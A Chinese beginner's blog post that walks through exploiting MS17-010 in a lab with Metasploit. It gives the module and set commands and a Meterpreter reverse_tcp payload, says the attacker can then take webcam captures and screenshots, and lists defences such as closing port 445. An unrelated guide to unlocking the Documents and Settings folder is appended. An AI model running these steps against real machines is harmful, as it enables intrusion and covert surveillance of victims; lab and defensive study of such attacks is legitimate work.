ms17010漏洞的简单利用

ms17010漏洞的简单利用,第1张

(第一次在发表文章,没啥经验,分享一些学习经验。大佬们多多包涵,也希望大家能够指出我的错误。)

靶机:windows7 x64  IP:192.168.1.5

攻击机:Kali Rolling (2019.3) x64 IP:192.168.1.3

两台主机在同一网段内;win7关闭防火墙并且开启445端口

1、使用ipconfig/ifconfig分别查看win7和kali的ip。

2、打开msf工具

每次开启都会有不同的界面

3、使用search命令搜索ms17_010

4、选择模块和设置条件

使用use来选择第三个模块,可以直接 use 2,也可以打全

然后用set来设置靶机IP set rhost 192.168.1.5

设置本机IP set lhost 192.168.1.3

设置监听端口 set lport 8888 不设置则默认4444端口

设置payload set payload windows/x64/meterpreter/reverse_tcp

还有另外一个payload能用于本实验,具体可以 show payloads 查看

最后,可以使用show options检查所有信息

5、开始渗透 run

稍等片刻 看到win则成功创建会话

6、成功之后,可以开启Windows7的摄像头,截图等等

具体可以用help查看

1、关闭445端口

2、打开防火墙,安装安全软件

3、安装对应补丁,这里就不放链接了

关闭445端口的方法:

1)打开控制面板----Windows防火墙----高级设置

2)点击新建规则,设置端口号的规则并且命名(如图)

msf工具虽然强大,但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。

1、打开C盘的根目录默认是没有Documents and Settings系统文件夹的,因为系统文件夹默认都是隐藏的。我们先选择【组织】菜单——文件夹和搜索选项。

2、选择【查看】:去掉【隐藏受保护的 *** 作系统文件】前的勾,确定。

3、此时可以看到Documents and Settings系统文件夹前是一个锁标记,这里因为我已经将Documents and Settings系统文件夹的保护权限取消掉了,所以锁标记就没了。

4、选择Documents and Settings系统文件夹,右键选择【属性】。选择【安全】选项卡:点击【高级】

5、默认有一个拒绝类型的特殊权限选项,选中拒绝类型的特殊权限选项,点击【更改权限】。

d出窗口后,选择拒绝类型的特殊权限选项删除。这里因为我已经删除了,所以看不到。

6、回到最前面的窗口,点击【编辑】,勾选【完全控制】。默认允许下是没有任何权限,确定后就可以双击Documents and Settings系统文件夹访问了,此时可以看到Documents and Settings系统文件夹可以正常访问。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/tougao/11491199.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-05-16
下一篇 2023-05-16

发表评论

登录后才能评论

评论列表(0条)

保存